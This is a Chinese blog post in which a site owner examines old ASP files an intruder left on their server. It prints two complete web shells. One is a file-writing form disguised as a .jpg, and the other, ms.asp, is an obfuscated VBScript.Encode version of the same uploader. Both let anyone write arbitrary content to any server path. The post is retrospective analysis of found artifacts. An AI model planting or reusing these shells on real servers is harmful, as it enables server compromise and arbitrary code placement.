安全篇 ━━ 整理几条黑客留下的礼物

最新推荐文章于 2023-03-18 13:49:31 发布

原创最新推荐文章于 2023-03-18 13:49:31 发布 · 286 阅读

1 ·

本内容遵循CC 4.0 BY-SA版权协议

安全专栏收录该内容

19 篇文章

订阅专栏

一篇关于十年前遗留的ASP代码的博客，代码中包含一个用于写入文件的表单，允许通过POST请求写入数据到指定路径。尽管存在潜在的安全风险，但黑客似乎并未利用此进行恶意操作。博客还展示了一些编码混淆的片段。

十年前的代码，虽然没有对外，但一直放在服务器上，今天整理一下，发现了一些好玩的。
总体来说，黑客还是蛮良心的，只是攻破了，并没有干什么破坏的事。

20081279747712.jpg

看似一张图片，其实用记事本打开是一串asp代码

<%Dim objfSo%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objfSo = Server.CreateObject("Scripting.fileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
OK!</font>
<%else%>
NO!</font>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<form action='' method=pOsT>
PATH:</font><br>
<input type=text name=syfdpath width=32 value="<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>" style="border:solid 1px" size=40><br>
GUT:<br>
<textarea name=cyfddata cols=39 rows=10 width=80 style="border:solid 1px"></textarea>
<br><input type=submit value=SAVE style="border:solid 1px">
</form>

ms.asp

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^CwAAAA==~9kh,W(LsUPbgMAAA==^#~@%>
<%#@~^CwAAAA==~9kh,09lYmPmgMAAA==^#~@%>
<%#@~^EgAAAA==~9kh,W(LZKE	OsbVnPXgYAAA==^#~@%>
<%#@~^FgAAAA==~Kx~DMWD,DdEs+~x6O~9wcAAA==^#~@%>
<%#@~^PwAAAA==~U+O,W(LsUP{~?D-+MR/.lY64N+mDcE?1DbwOkULcsrVjXkYnh}4Ln^DJbP/xUAAA==^#~@%>
<%#@~^KQAAAA==~b0~:Db:`M+$;+kYcJkXW[alY4E#*@!@*rE~Y4+	PqgwAAA==^#~@%>
<%#@~^HQAAAA==~6NCDl,'PM+$;+kYcJ1XW[9lYmE#,mwkAAA==^#~@%>
<%#@~^QQAAAA==~U+O,W(LZKE	OsbVn'K4%oURZMnlD+KaOsbV`.+5;/O`rdX6N2CDtJbS:D;+*~JhcAAA==^#~@%>
<%#@~^GgAAAA==~K4%;W!xYwk^nRqDrYPW[mYl,XQkAAA==^#~@%>
<%#@~^EAAAAA==~b0~DMP'ZPD4+	P1AQAAA==^#~@%>
<%#@~^OwAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{D+9@*dl7+,?;m^nk/Z@!JWW	Y@*E,fRMAAA==^#~@%>
<%#@~^BgAAAA==~VdP6QEAAA==^#~@%>
<%#@~^PQAAAA==~M+daW	/+chMrYPE@!6WUO,mW^GD{D+9@*jl7+,jU?;^1+d/e@!z6WUO@*JPIBQAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^CwAAAA==~D.cm^+lMPvgMAAA==^#~@%>
<%#@~^CAAAAA==~x[,k6PZgIAAA==^#~@%>
<%#@~^FAAAAA==~K4%;W!xYwk^nR;VG/PKAcAAA==^#~@%>
<%#@~^GgAAAA==~U+O,W(LZKE	OsbVn'gWO4bxo,ZAkAAA==^#~@%>
<%#@~^FgAAAA==~U+O,W(LsUr,xPgWOtbxL~AwcAAA==^#~@%>
<%#@~^MQAAAA==~"+daW	/+chMrYPE@!6W.h,lmDrW	'BE~h+DtKNxwGdD@*EPRxAAAA==^#~@%>
<%#@~^WQAAAA==~"+daW	/+chMrYPE保存文件的@!6WUO,mW^GD{D+9@*绝对路径c包括文件名)如G)'hn4w黑防#&nlX!akmxL m/wbl@!zWW	O@*J~bRcAAA==^#~@%>
<%#@~^RQAAAA==~"+daW	/+cMrYPE@!bx2;DPYH2+{Y+XO~xm:'dXW[alOt,Ak9Y4x2 Pdr.+x*Z@*rPehcAAA==^#~@%>
<%#@~^GQAAAA==~"+daW	/+cMrYPE@!(D@*E,egcAAA==^#~@%>
<%#@~^GgAAAA==~"+daW	/+chMrYPE本文件绝对路径J,TAYAAA==^#~@%>
<%=#@~^NwAAAA==dD-Dc:lawmOtvIn;!+dOc?+M-+M.lMrC4^+k`E?/]&nP{g)HAJbb,MhMAAA==^#~@%>
<%#@~^GQAAAA==~"+daW	/+chMrYPE@!(D@*E,mgcAAA==^#~@%>
<%#@~^MgAAAA==~"+daW	/+chMrYPE输入马的内容)v萧瑟风魔奉献给黑防.(K的礼物都来加入黑防吧*JPxgcAAA==^#~@%>
<%#@~^UwAAAA==~"+daW	/+chMrYPE@!D+aOmD+m~xm:+{^z09NmYCP^G^/x%Z~DKhdx8!PAr9Y4'2+@*@!&D+XYlM+m@*J,ShsAAA==^#~@%>
<%#@~^MQAAAA==~"+daW	/+chMrYPE@!bx2;DPYH2+{/E(hrY,\mV;+x保存@*rPIxAAAA==^#~@%>
<%#@~^HAAAAA==~"+daW	/+chMrYPE@!J0G.s@*J,qQgAAA==^#~@%>